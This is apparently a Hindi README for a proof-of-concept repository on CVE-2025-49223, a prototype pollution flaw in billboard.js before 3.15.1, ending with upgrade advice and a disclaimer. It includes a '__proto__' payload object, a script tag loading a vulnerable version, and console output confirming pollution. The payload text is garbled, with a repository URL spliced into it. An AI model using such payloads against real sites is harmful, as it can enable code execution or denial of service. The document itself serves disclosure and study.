
CVE-2025-49223 - Billboard.js में Prototype Pollution
billboard.js के 3.15.1 से पहले के संस्करण में
generateफ़ंक्शन के माध्यम से prototype pollution पाया गया था, जो हमलावरों को मनमाने गुण इंजेक्ट करके मनमाना कोड निष्पादित करने या Denial of Service (DoS) उत्पन्न करने की अनुमति दे सकता है।
यह रिपॉज़िटरी billboard.js के 3.15.1 से पहले के संस्करणों में पाई गई Prototype Pollution भेद्यता को प्रदर्शित करती है, जिसे CVE-2025-49223 के रूप में घोषित किया गया है।
<= 3.14.0>= 3.15.1ब्राउज़र में index.html खोलें और prototype pollution के प्रयासों के लिए कंसोल लॉग जाँचें।
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/billboard.pkgd.min.js"></script>
{
["__proto__"]: https://raw.githubusercontent.com/louay-075/cve-2025-49223-billboardjs-poc/HEAD/%7B
polluted: "polluted_via_string_key"
}
}
🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key
यह पुष्टि करता है कि एक हमलावर Object.prototype को प्रदूषित कर सकता है, जो पृष्ठ पर बनाई गई किसी भी भविष्य की वस्तु को प्रभावित करेगा।
सफल शोषण से निम्नलिखित हो सकते हैं:
billboard.js को 3.15.1 या उससे नए संस्करण में अपग्रेड करें⚠️ अस्वीकरण: यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए है। जिम्मेदारी से उपयोग करें।